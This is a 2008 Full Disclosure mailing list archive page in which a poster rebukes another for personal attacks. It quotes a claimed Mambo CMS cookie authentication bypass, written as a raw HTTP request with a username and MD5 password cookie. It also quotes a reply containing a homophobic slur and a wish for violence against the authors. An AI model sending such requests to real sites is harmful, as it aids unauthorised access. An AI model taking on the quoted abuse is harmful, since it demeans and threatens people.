Full Disclosure mailing list archives

Re: Mambo Cookie Authentication Bypass Exploit

From: "Garrett M. Groff" <groffg () gmgdesign com>
Date: Tue, 10 Jun 2008 09:19:44 -0400

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

And situations involving social interaction are not for you. Please avoid
them at all costs until social skills improve.

Oh, and please read the list charter that was recently distributed. On it,
you will see that offensive language and personal attacks are disallowed.

G


- ----- Original Message ----- 
From: <crunkd () hushmail com>
To: <full-disclosure () lists grok org uk>
Cc: <halabaluza.team () gmail com>
Sent: Tuesday, June 10, 2008 3:05 AM
Subject: Re: [Full-disclosure] Mambo Cookie Authentication Bypass Exploit

So to perform this 'bypass' you need the password in the first
place? You absolute fucking morons, the security scene is not for
you. I hope someone stabs you over a food stamp. Faggots.

------------------------------------------------------------
Halabaluza Team Halabaluza Team halabaluza.team at gmail.com
Sun Jun 8 12:29:56 BST 2008

   * Previous message: [Full-disclosure] avira update.exe
   * Next message: [Full-disclosure] [ GLSA 200806-03 ] Imlib 2:
User-assisted execution of arbitrary code
   * Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

for mambo <= 4.5.5 and <= 4.6.2 maybe others

GET http://[TARGET]/index.php
Host: [TARGET]
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b5)
Gecko/2008050509 Firefox/3.0b5
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/
plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Connection: keep-alive
Cookie: usercookie[username]=[USERNAME];usercookie[password]=[MD5]
Cache-Control: max-age=0

FREE TIBET!


--
Smart Girls Secret Weapon
Read Unbiased Beauty Product Reviews, Get Helpful Tips, Tricks and Sam
http://tagline.hushmail.com/fc/JKFkuIjyaUM3E9zcp2f7ppavbouTIiiPdCquThperf
oYTGho1dzYFq/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.8.3 (Build 4028) - not licensed for commercial use: 
www.pgp.com
Charset: utf-8

wj8DBQFITn9RSGIRT5oVahwRAvPpAKCG3E5/0eqUAqXDy/+wMucj4JqtkQCeICbU
R106Zq59OTfeb8s0RFcXY10=
=FPM3
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Mambo Cookie Authentication Bypass Exploit Halabaluza Team Halabaluza Team (Jun 09)
- <Possible follow-ups>
- Re: Mambo Cookie Authentication Bypass Exploit crunkd (Jun 10)
  - Re: Mambo Cookie Authentication Bypass Exploit Garrett M. Groff (Jun 10)
  - Re: Mambo Cookie Authentication Bypass Exploit Brian Kim (Jun 10)
- Re: Mambo Cookie Authentication Bypass Exploit crunkd (Jun 11)